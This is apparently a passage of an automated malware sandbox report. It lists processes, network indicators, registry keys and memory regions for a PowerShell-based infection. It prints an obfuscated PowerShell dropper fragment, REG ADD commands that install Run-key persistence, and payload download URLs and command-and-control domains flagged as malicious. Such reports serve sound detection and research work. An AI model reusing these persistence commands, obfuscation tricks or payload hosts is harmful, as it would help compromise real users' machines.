O F$stRHyeMahCia .r,edMaeKknDi ');Tilfredsstillelse (Viscometres ' $AmgTrlG,oOvbNoa,ul A:.eHGry.epIno Cc nh IoTel ,eResTotF,e ArB,i BnD.eLkmApi.ra.s En=Gr ,e[diS .yRes rt MeS.m a. oCT,osonV,vB.eBerG.tBe] s:Re:U,FR,rraoB mAyBSkahos,aeSt6.h4DuSCotI r.riConGrgRe(Sp$ScX AeAbnS,oInpO.h DoavnMetLiiOvcVa2B,4Ra9 ) , ');Tilfredsstillelse (Viscometres ',o$.rgf,l KoDyb,oaPhlT :SaG dhKreHatInt KoAne Ms S ,e=Ge K,[N,S TyIbs,at,fecomIn. eTlae Sx Rt U. SESpnS cAroFod,eiPanN,ggi]Ko:Ud:VeA.nSUnC.nIApI R.CyGPaeBitPoS RtAfrC iNenTagUd( B$ HH.yPapE o Gc.eh AoTal,ee BsRet e Tr oi Kn SestmFiiAcaBl)Bl ');Tilfredsstillelse (Viscometres ',i$PrgPal Po vbPeaL.l L:GoxL,yPrl,ooPapCoyOprP.o agStrPrak.p ohU,yBl=si$ oG PhDae ftUttSyoOre.rsHy. .s KuTybInsCatAprDriL.nw gTa(,a$PhCNiaE.lBilFloBrvB,i.aaKonMa,.e$inMKeaTrl MaUncLae.aa eE.)G ');Tilfredsstillelse $xylopyrography;"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belinda103.Eft && echo t"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bilateralities" /t REG_EXPAND_SZ /d "%Arrestationernes110% -w 1 $Faucals83=(Get-ItemProperty -Path 'HKCU:\sttyskers\').talevant;%Arrestationernes110% ($Faucals83)"
malicious
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bilateralities" /t REG_EXPAND_SZ /d "%Arrestationernes110% -w 1 $Faucals83=(Get-ItemProperty -Path 'HKCU:\sttyskers\').talevant;%Arrestationernes110% ($Faucals83)"
malicious
C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
"C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe"
malicious
C:\Windows\SysWOW64\relog.exe
"C:\Windows\SysWOW64\relog.exe"
malicious
C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
"C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe"
malicious
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\srdelayed.exe
"C:\Windows\SysWOW64\srdelayed.exe"
There are 20 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://www.atlpicsstudios.com/pbzm/
3.33.130.190
malicious
http://www.katasoo.com/7qad/
188.114.96.3
malicious
http://www.shabygreen.top/r9e8/
203.161.41.205
malicious
http://www.martinminorgroup.com/oyqt/
34.149.87.45
malicious
http://www.411divorce.com/hxac/
5.78.41.174
malicious
http://www.vendasnaweb1.com/jk4m/
162.241.2.92
malicious
http://www.gtprivatewealth.com/4d31/
3.33.130.190
malicious
http://cpanel-adminhost.com/Stevns179.mix
193.25.216.165
http://nuget.org/NuGet.exe
unknown
http://geoplugin.net/json.gp(
unknown
http://www.imvu.comr
unknown
https://avocaldoperu.com/
unknown
http://geoplugin.net/json.gpg
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
http://geoplugin.net/json.gp/
unknown
https://avocaldoperu.com/Jouse1.pngamalsAffavocaldoperuone.com/Jouse1.png
unknown
https://contoso.com/License
unknown
http://www.imvu.com
unknown
https://contoso.com/Icon
unknown
https://avocaldoperu.com/Jouse4.png
104.21.62.202
http://www.nirsoft.net
unknown
https://github.com/Pester/Pester
unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
unknown
http://geoplugin.net/json.gp
178.237.33.50
http://avocaldoperu.com
unknown
https://www.google.com
unknown
http://geoplugin.net/json.gpn.net/json.gp
unknown
https://avocaldoperu.com/Jouse1.png
104.21.62.202
http://cpanel-adminhost.com/wWdnBiepyw166.bin
193.25.216.165
https://aka.ms/pscore6lBdq
unknown
https://avocaldoperu.com
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://avocaldoperuone.com/Jouse4.png
unknown
https://www.google.com/accounts/servicelogin
unknown
https://login.yahoo.com/config/login
unknown
http://geoplugin.net/json.gpX
unknown
https://aka.ms/pscore68
unknown
http://www.openhandedvision.com/ehr0/
142.250.186.147
http://www.nirsoft.net/
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://www.ebuddy.com
unknown
There are 34 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
ctorq.net
3.33.130.190
malicious
kera333.org
64.46.102.70
malicious
gtprivatewealth.com
3.33.130.190
malicious
td-ccm-neg-87-45.wixdns.net
34.149.87.45
malicious
vendasnaweb1.com
162.241.2.92
malicious
www.shabygreen.top
203.161.41.205
malicious
atlpicsstudios.com
3.33.130.190
malicious
411divorce.com
5.78.41.174
malicious
www.katasoo.com
188.114.96.3
malicious
iwarsut775laudrye2.duckdns.org
172.111.137.132
malicious
www.openhandedvision.com
unknown
malicious
www.vendasnaweb1.com
unknown
malicious
www.411divorce.com
unknown
malicious
www.ctorq.net
unknown
malicious
www.atlpicsstudios.com
unknown
malicious
www.martinminorgroup.com
unknown
malicious
www.kera333.org
unknown
malicious
www.gtprivatewealth.com
unknown
malicious
avocaldoperu.com
104.21.62.202
geoplugin.net
178.237.33.50
cpanel-adminhost.com
193.25.216.165
ghs.googlehosted.com
142.250.186.147
There are 12 hidden domains, click here to show them.

IPs

IP
Domain
Country
Malicious
5.78.41.174
411divorce.com
Iran (ISLAMIC Republic Of)
malicious
188.114.96.3
www.katasoo.com
European Union
malicious
203.161.41.205
www.shabygreen.top
Malaysia
malicious
172.111.137.132
iwarsut775laudrye2.duckdns.org
United States
malicious
34.149.87.45
td-ccm-neg-87-45.wixdns.net
United States
malicious
162.241.2.92
vendasnaweb1.com
United States
malicious
3.33.130.190
ctorq.net
United States
malicious
104.21.62.202
avocaldoperu.com
United States
193.25.216.165
cpanel-adminhost.com
Germany
178.237.33.50
geoplugin.net
Netherlands
142.250.186.147
ghs.googlehosted.com
United States
There are 1 hidden IPs, click here to show them.

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Almindeligheden
malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Bilateralities
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\Neglective
Tveboplantes
HKEY_CURRENT_USER\Environment
outoven
HKEY_CURRENT_USER\SOFTWARE\shietgtst-TYE3VH
exepath
HKEY_CURRENT_USER\SOFTWARE\shietgtst-TYE3VH
licence
HKEY_CURRENT_USER\SOFTWARE\shietgtst-TYE3VH
time
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.ApplicationCompany
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\sttyskers
talevant
HKEY_CURRENT_USER\Environment
Arrestationernes110
There are 31 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
8740000
direct allocation
page execute and read and write
malicious
59E7000
trusted library allocation
page read and write
malicious
5634000
trusted library allocation
page read and write
malicious
3500000
trusted library allocation
page read and write
malicious
20B6C824000
trusted library allocation
page read and write
malicious
4843000
remote allocation
page execute and read and write
malicious
85A0000
direct allocation
page execute and read and write
malicious
A283000
direct allocation
page execute and read and write
malicious
5B55000
trusted library allocation
page read and write
malicious
3240000
unclassified section
page execute and read and write
malicious
2F20000
system
page execute and read and write
malicious
12D0000
system
page execute and read and write
malicious
33B0000
trusted library allocation
page read and write
malicious
C162000
direct allocation
page execute and read and write
malicious
D40000
unkown
page readonly
3401000
heap
page read and write
20B5C340000
trusted library allocation
page read and write
3651000
heap
page read and write
51A1000
heap
page read and write
42DF000
stack
page read and write
8770000
direct allocation
page read and write
218EF000
stack
page read and write
3255000
heap
page read and write
BBF000
heap
page read and write
5F9F000
heap
page read and write
5243000
remote allocation
page execute and read and write
492E000
stack
page read and write
2121E000
stack
page read and write
AFA000
heap
page read and write
21BD3000
heap
page read and write
83D000
heap
page read and write
2ACC000
stack
page read and write
20B748C0000
heap
page read and write
7FFD9B940000
trusted library allocation
page read and write
23F1A000
heap
page read and write
4B0A000
heap
page read and write
7342000
heap
page read and write
5E70000
direct allocation
page read and write
8445000
heap
page read and write
2F90000
heap
page read and write
1B9F8180000
trusted library allocation
page read and write
5DE0000
direct allocation
page read and write
3254000
heap
page read and write
3401000
heap
page read and write
45D3000
trusted library allocation
page execute and read and write
4CB0000
trusted library allocation
page read and write
3401000
heap
page read and write
3240000
heap
page read and write
239EF000
stack
page read and write
2125E000
stack
page read and write
3401000
heap
page read and write
3591000
heap
page read and write
3640000
heap
page read and write
3401000
heap
page read and write
1B9F68E3000
heap
page read and write
5FA0000
heap
page read and write
4CE2000
trusted library allocation
page read and write
3401000
heap
page read and write
2F1D000
stack
page read and write
229A0000
unclassified section
page execute and read and write
2870000
heap
page read and write
7FFD9B820000
trusted library allocation
page read and write
72D0000
trusted library allocation
page read and write
2D1373E000
stack
page read and write
35A0000
heap
page read and write
2F4E000
unkown
page read and write
2F12000
trusted library allocation
page read and write
22D000
stack
page read and write
AC83000
direct allocation
page execute and read and write
20B5AC60000
heap
page read and write
BE0000
heap
page read and write
BCC000
heap
page read and write
3401000
heap
page read and write
35FA000
heap
page read and write
1180000
unkown
page readonly
225000
unkown
page read and write
14B8000
heap
page read and write
3401000
heap
page read and write
36CA000
heap
page read and write
1494000
heap
page read and write
8181000
heap
page read and write
4C3A000
heap
page read and write
20B5CFD7000
trusted library allocation
page read and write
7790000
trusted library allocation
page read and write
5D3F000
stack
page read and write
3401000
heap
page read and write
3401000
heap
page read and write
1B9F68B9000
heap
page read and write
3657000
heap
page read and write
3401000
heap
page read and write
590C000
trusted library allocation
page read and write
105A000
stack
page read and write
23F9A000
heap
page read and write
D50000
heap
page read and write
3401000
heap
page read and write
889C000
stack
page read and write
211000
unkown
page execute read
20B5CFB8000
trusted library allocation
page read and write
23FB1000
heap
page read and write
4DAC000
trusted library allocation
page read and write
7FFD9B8B0000
trusted library allocation
page read and write
2FBF000
stack
page read and write
BBF000
heap
page read and write
443D000
trusted library allocation
page execute and read and write
4680000
trusted library allocation
page execute and read and write
2D138BB000
stack
page read and write
3401000
heap
page read and write
20B74993000
heap
page read and write
21660000
direct allocation
page read and write
3401000
heap
page read and write
3401000
heap
page read and write
230A0000
direct allocation
page read and write
3401000
heap
page read and write
368E000
heap
page read and write
4D45000
trusted library allocation
page read and write
8181000
heap
page read and write
3401000
heap
page read and write
2186C000
stack
page read and write
2BAC000
heap
page read and write
63F000
stack
page read and write
6852000
remote allocation
page execute and read and write
27F0000
heap
page read and write
6FEF000
stack
page read and write
348E000
stack
page read and write
6F80000
heap
page read and write
4AF3000
heap
page read and write
20B5CFA2000
trusted library allocation
page read and write
237F0000
direct allocation
page read and write
2A868FA0000
heap
page read and write
7FFD9B5ED000
trusted library allocation
page execute and read and write
53E6000
heap
page read and write
7F30000
trusted library allocation
page read and write
7413000
heap
page read and write
5D80000
direct allocation
page read and write
872E000
stack
page read and write
20B5AA90000
heap
page read and write
7521000
heap
page read and write
20B5E6E1000
trusted library allocation
page read and write
5F63000
heap
page read and write
3401000
heap
page read and write
363D000
heap
page read and write
45E0000
trusted library allocation
page read and write
2F30000
trusted library allocation
page read and write
BB9000
heap
page read and write
2B00000
heap
page read and write
3401000
heap
page read and write
3401000
heap
page read and write
4B21000
heap
page read and write
23EA0000
heap
page read and write
44A8000
trusted library allocation
page read and write
74C9000
heap
page read and write
BE5000
heap
page read and write
4AFF000
heap
page read and write
2FD0000
heap
page read and write
2A868FCB000
heap
page read and write
14B8000
heap
page read and write
81D0000
heap
page read and write
7690000
trusted library allocation
page read and write
D30000
unkown
page readonly
3623000
heap
page read and write
B5E000
heap
page read and write
24241000
heap
page read and write
3022000
unkown
page read and write
960000
unkown
page readonly
3651000
heap
page read and write
387E000
stack
page read and write
2A868F00000
heap
page read and write
23F19000
heap
page read and write
3401000
heap
page read and write
3651000
heap
page read and write
B57000
heap
page read and write
3401000
heap
page read and write
7232000
heap
page read and write
2EDD000
stack
page read and write
21E000
unkown
page readonly
4C5F000
heap
page read and write
2EFD000
stack
page read and write
7FFD9B700000
trusted library allocation
page execute and read and write
5D50000
heap
page readonly
23F9C000
heap
page read and write
4E0C000
trusted library allocation
page read and write
3401000
heap
page read and write
80D0000
trusted library allocation
page read and write
4C55000
heap
page read and write
3254000
heap
page read and write
51EF000
stack
page read and write
6DD0000
direct allocation
page read and write
571F000
stack
page read and write
3401000
heap
page read and write
3E02000
unclassified section
page read and write
3401000
heap
page read and write
7760000
trusted library allocation
page read and write
364E000
heap
page read and write
5F5E000
heap
page read and write
1B9F68DC000
heap
page read and write
DC0000
unkown
page readonly
362B000
heap
page read and write
4AEF000
stack
page read and write
3641000
heap
page read and write
23CD000
stack
page read and write
20B5CFB0000
trusted library allocation
page read and write
76B0000
trusted library allocation
page execute and read and write
20B5A8C0000
heap
page read and write
2FE0000
heap
page read and write
23D70000
direct allocation
page read and write
2E90000
heap
page read and write
3344000
heap
page read and write
57AF000
stack
page read and write
4740000
heap
page execute and read and write
3390000
trusted library allocation
page read and write
3640000
heap
page read and write
6CE0000
heap
page read and write
7EE60000
trusted library allocation
page execute and read and write
2F6FFD000
stack
page read and write
7330000
heap
page execute and read and write
88DC000
stack
page read and write
7640000
trusted library allocation
page read and write
435E000
stack
page read and write
2874000
heap
page read and write
20B5A9A0000
heap
page read and write
3401000
heap
page read and write
78C000
stack
page read and write
6F7C000
stack
page read and write
4D0A000
trusted library allocation
page read and write
3E43000
remote allocation
page execute and read and write
32D0000
heap
page read and write
3588000
heap
page read and write
39F0000
direct allocation
page execute and read and write
321B000
heap
page read and write
55C1000
trusted library allocation
page read and write
4CA5000
heap
page read and write
2FB2000
stack
page read and write
23F9E000
heap
page read and write
7780000
trusted library allocation
page read and write
3401000
heap
page read and write
7366000
heap
page read and write
6BF0000
direct allocation
page read and write
3720000
trusted library allocation
page execute and read and write
35F0000
heap
page read and write
6E48000
trusted library allocation
page read and write
3645000
heap
page read and write
3401000
heap
page read and write
8181000
heap
page read and write
8100000
direct allocation
page read and write
28C0000
unkown
page read and write
3638000
heap
page read and write
9F9000
heap
page read and write
7480000
trusted library allocation
page read and write
D6591FF000
unkown
page read and write
2A06000
heap
page read and write
3F90000
unkown
page execute and read and write
45D4000
trusted library allocation
page read and write
4B0A000
heap
page read and write
7FFD9B8F0000
trusted library allocation
page read and write
2F8C000
stack
page read and write
227000
unkown
page readonly
658000
heap
page read and write
745B000
heap
page read and write
81DD000
stack
page read and write
3401000
heap
page read and write
12C0000
heap
page read and write
DC0000
unkown
page read and write
4CB4000
heap
page read and write
277E000
unkown
page read and write
363D000
heap
page read and write
35D5000
heap
page read and write
825C000
stack
page read and write
81A0000
direct allocation
page read and write
84D0000
heap
page read and write
304F000
unkown
page read and write
8453000
heap
page read and write
5F9B000
heap
page read and write
D10000
heap
page read and write
210000
unkown
page readonly
6EEB000
stack
page read and write
817E000
stack
page read and write
4CA5000
heap
page read and write
59D9000
trusted library allocation
page read and write
8150000
direct allocation
page read and write
20B5E06B000
trusted library allocation
page read and write
3210000
heap
page read and write
5CDE000
stack
page read and write
752E000
heap
page read and write
2AA0000
unkown
page readonly
3370000
heap
page read and write
7610000
trusted library allocation
page read and write
7FFD9B5E3000
trusted library allocation
page execute and read and write
7FFD9B870000
trusted library allocation
page read and write
4F02000
unclassified section
page read and write
1B9F85BE000
trusted library allocation
page read and write
21340000
heap
page read and write
20B5D003000
trusted library allocation
page read and write
2F9B000
stack
page read and write
4CAD000
heap
page read and write
270E000
unkown
page read and write
365D000
heap
page read and write
2F7FFE000
stack
page read and write
3401000
heap
page read and write
20B747BE000
heap
page read and write
361E000
heap
page read and write
3401000
heap
page read and write
3401000
heap
page read and write
2EB0000
heap
page read and write
23BCC000
stack
page read and write
3401000
heap
page read and write
5BE000
stack
page read and write
753E000
stack
page read and write
24241000
heap
page read and write
473000
system
page execute and read and write
5D6F000
stack
page read and write
20B5C2C0000
heap
page readonly
3647000
heap
page read and write
74F0000
trusted library allocation
page read and write
81CE000
heap
page read and write
3401000
heap
page read and write
6CF0000
heap
page read and write
8192000
heap
page read and write
15B0000
unkown
page readonly
20B6CA9E000
trusted library allocation
page read and write
11A0000
unkown
page readonly
2DCE000
stack
page read and write
3401000
heap
page read and write
4CB1000
heap
page read and write
3401000
heap
page read and write
3401000
heap
page read and write
2D132FE000
stack
page read and write
3401000
heap
page read and write
7376000
heap
page read and write
3344000
heap
page read and write
5F1E000
heap
page read and write
CB62000
direct allocation
page execute and read and write
2E10000
heap
page read and write
2F7C000
stack
page read and write
2C84000
heap
page read and write
85D0000
direct allocation
page read and write
2BDA000
heap
page read and write
2F67FC000
stack
page read and write
360C000
heap
page read and write
48EE000
stack
page read and write
23F9C000
heap
page read and write
3401000
heap
page read and write
5D60000
direct allocation
page read and write
3719000
heap
page read and write
73EE000
heap
page read and write
8260000
heap
page read and write
7DF426CA0000
trusted library allocation
page execute and read and write
6B9D000
stack
page read and write
970000
unkown
page readonly
7F20000
trusted library allocation
page read and write
3401000
heap
page read and write
23F9E000
heap
page read and write
8170000
trusted library allocation
page read and write
3401000
heap
page read and write
749A000
heap
page read and write
3631000
heap
page read and write
50C8000
trusted library allocation
page read and write
8170000
direct allocation
page read and write
35FA000
heap
page read and write
6ACE000
stack
page read and write
3680C000
system
page read and write
BCC000
heap
page read and write
8260000
trusted library allocation
page read and write
45BF000
stack
page read and write
94F000
stack
page read and write
818B000
heap
page read and write
218F0000
heap
page read and write
4CA5000
heap
page read and write
532F000
stack
page read and write
35E6000
heap
page read and write
36CA000
heap
page read and write
BCC000
heap
page read and write
3401000
heap
page read and write
344F000
stack
page read and write
7460000
trusted library allocation
page read and write
3401000
heap
page read and write
3664000
heap
page read and write
83D000
heap
page read and write
402D000
unkown
page execute and read and write
1B9F8180000
trusted library allocation
page read and write
773F000
trusted library allocation
page read and write
8181000
heap
page read and write
2ADE000
stack
page read and write
6EAE000
stack
page read and write
3401000
heap
page read and write
323F000
stack
page read and write
4B0A000
heap
page read and write
7470000
trusted library allocation
page execute and read and write
3401000
heap
page read and write
3401000
heap
page read and write
81B0000
direct allocation
page read and write
20B5CFED000
trusted library allocation
page read and write
3651000
heap
page read and write
3344000
heap
page read and write
227000
unkown
page readonly
3254000
heap
page read and write
30E2000
unkown
page read and write
3401000
heap
page read and write
3254000
heap
page read and write
7FFD9B690000
trusted library allocation
page read and write
3401000
heap
page read and write
7320000
heap
page read and write
20B5AA41000
heap
page read and write
8750000
trusted library allocation
page read and write
23F0000
heap
page read and write
3443000
remote allocation
page execute and read and write
3401000
heap
page read and write
26FD000
stack
page read and write
85C0000
direct allocation
page read and write
1B9F8403000
trusted library allocation
page read and write
364B000
heap
page read and write
3401000
heap
page read and write
78D000
heap
page read and write
8181000
heap
page read and write
2E3E000
stack
page read and write
3401000
heap
page read and write
2C60000
heap
page read and write
57D0000
trusted library allocation
page read and write
6D70000
direct allocation
page read and write
3610000
heap
page read and write
3320000
heap
page read and write
2C80000
heap
page read and write
473C000
stack
page read and write
7720000
trusted library allocation
page read and write
20B5A7E0000
heap
page read and write
8180000
trusted library allocation
page read and write
3971000
heap
page read and write
84CF000
stack
page read and write
4C9B000
heap
page read and write
5DB0000
direct allocation
page read and write
3254000
heap
page read and write
43B0000
heap
page read and write
4788000
trusted library allocation
page read and write
33F0000
heap
page read and write
4602000
trusted library allocation
page read and write
4C4D000
trusted library allocation
page read and write
7F0000
heap
page read and write
70D0000
heap
page read and write
1460000
unkown
page readonly
4CB8000
heap
page read and write
23F2C000
heap
page read and write
23B4B000
stack
page read and write
5EC000
stack
page read and write
7F40000
heap
page read and write
23F41000
heap
page read and write
7EE000
stack
page read and write
4D68000
heap
page read and write
9F0000
heap
page read and write
3635000
heap
page read and write
A10000
heap
page read and write
81BF000
heap
page read and write
4C54000
heap
page read and write
7190000
heap
page read and write
3401000
heap
page read and write
20B749E0000
heap
page execute and read and write
87B0000
direct allocation
page read and write
23A00000
heap
page read and write
1341000
system
page execute and read and write
3664000
heap
page read and write
4CA5000
heap
page read and write
105A000
stack
page read and write
3401000
heap
page read and write
2C25000
heap
page read and write
6C30000
direct allocation
page read and write
53B000
stack
page read and write
445A000
trusted library allocation
page execute and read and write
20B74913000
heap
page read and write
23E83000
unclassified section
page execute and read and write
3783000
heap
page read and write
3607000
heap
page read and write
7FFD9B5E2000
trusted library allocation
page read and write
20B5CC50000
trusted library allocation
page read and write
83D000
heap
page read and write
7435000
heap
page read and write
8181000
heap
page read and write
7FFD9B5FB000
trusted library allocation
page read and write
20B5A920000
heap
page read and write
CFC000
stack
page read and write
4433000
trusted library allocation
page execute and read and write
7092000
heap
page read and write
3090000
heap
page read and write
3444000
heap
page read and write
762E000
stack
page read and write
3651000
heap
page read and write
4EA1000
trusted library allocation
page read and write
3401000
heap
page read and write
7FFD9B890000
trusted library allocation
page read and write
2EA0000
heap
page read and write
3254000
heap
page read and write
87A0000
direct allocation
page read and write
3401000
heap
page read and write
2C60000
heap
page read and write
B3A000
heap
page read and write
3B1D000
direct allocation
page execute and read and write
80B000
heap
page read and write
3401000
heap
page read and write
20B5E07C000
trusted library allocation
page read and write
34FC000
heap
page read and write
19D000
stack
page read and write
4440000
trusted library allocation
page read and write
731A000
trusted library allocation
page read and write
3401000
heap
page read and write
3401000
heap
page read and write
23F89000
heap
page read and write
33E0000
heap
page read and write
363C000
heap
page read and write
3401000
heap
page read and write
8160000
direct allocation
page read and write
8180000
heap
page read and write
4A52000
remote allocation
page execute and read and write
46DE000
stack
page read and write
45E9000
trusted library allocation
page read and write
8280000
heap
page read and write
20B6CAAD000
trusted library allocation
page read and write
BB7000
heap
page read and write
23400000
heap
page read and write
4449000
trusted library allocation
page read and write
3401000
heap
page read and write
1450000
unkown
page readonly
4780000
trusted library allocation
page read and write
3657000
heap
page read and write
41B000
system
page execute and read and write
3254000
heap
page read and write
8330000
heap
page read and write
34E0000
heap
page read and write
3401000
heap
page read and write
2E7E000
stack
page read and write
440000
heap
page read and write
5D90000
direct allocation
page read and write
23E10000
unclassified section
page execute and read and write
80A0000
trusted library allocation
page read and write
1B9F6860000
heap
page read and write
732E000
trusted library allocation
page read and write
21680000
direct allocation
page read and write
3401000
heap
page read and write
20B5CC39000
trusted library allocation
page read and write
3640000
heap
page read and write
4B06000
heap
page read and write
880E000
stack
page read and write
7FFD9B6C6000
trusted library allocation
page execute and read and write
218AE000
stack
page read and write
3D32000
direct allocation
page execute and read and write
8181000
heap
page read and write
7320000
trusted library allocation
page read and write
50EE000
stack
page read and write
3401000
heap
page read and write
5626000
trusted library allocation
page read and write
D10000
heap
page read and write
8181000
heap
page read and write
3344000
heap
page read and write
8198000
heap
page read and write
819A000
heap
page read and write
1B9F8400000
trusted library allocation
page read and write
237E0000
direct allocation
page read and write
51A0000
heap
page read and write
8457000
heap
page read and write
1B9F8160000
heap
page read and write
45A0000
trusted library section
page read and write
20B74964000
heap
page read and write
483E000
stack
page read and write
2D1317D000
stack
page read and write
36AD000
heap
page read and write
3EBE000
unkown
page read and write
8190000
heap
page read and write
5DF0000
direct allocation
page read and write
4404000
unclassified section
page read and write
3401000
heap
page read and write
1190000
unkown
page readonly
20B74B60000
heap
page execute and read and write
7740000
trusted library allocation
page read and write
7750000
heap
page read and write
B6C000
heap
page read and write
2F77FE000
stack
page read and write
8110000
direct allocation
page read and write
20B5C2E0000
heap
page execute and read and write
6EBF000
stack
page read and write
7290000
trusted library allocation
page read and write
2D130BE000
stack
page read and write
3646000
heap
page read and write
74B7000
heap
page read and write
2B3D000
heap
page read and write
AD0000
heap
page read and write
6E40000
trusted library allocation
page read and write
21C50000
direct allocation
page execute and read and write
20B5CFFE000
trusted library allocation
page read and write
3254000
heap
page read and write
23D40000
unclassified section
page execute and read and write
3401000
heap
page read and write
23C4D000
stack
page read and write
23E69000
unclassified section
page execute and read and write
3FA0000
remote allocation
page execute and read and write
76F0000
trusted library allocation
page read and write
9F8000
heap
page read and write
3401000
heap
page read and write
6D00000
heap
page read and write
4F6E000
stack
page read and write
33D0000
heap
page read and write
A087000
trusted library allocation
page read and write
3401000
heap
page read and write
57D0000
heap
page read and write
3401000
heap
page read and write
20B6C7C0000
trusted library allocation
page read and write
930000
heap
page read and write
970000
unkown
page readonly
363C000
heap
page read and write
23970000
remote allocation
page read and write
3401000
heap
page read and write
84D000
heap
page read and write
20B5CFF9000
trusted library allocation
page read and write
3631000
heap
page read and write
1400000
unkown
page read and write
3401000
heap
page read and write
4C1B000
trusted library allocation
page read and write
82F000
heap
page read and write
7FFD9B860000
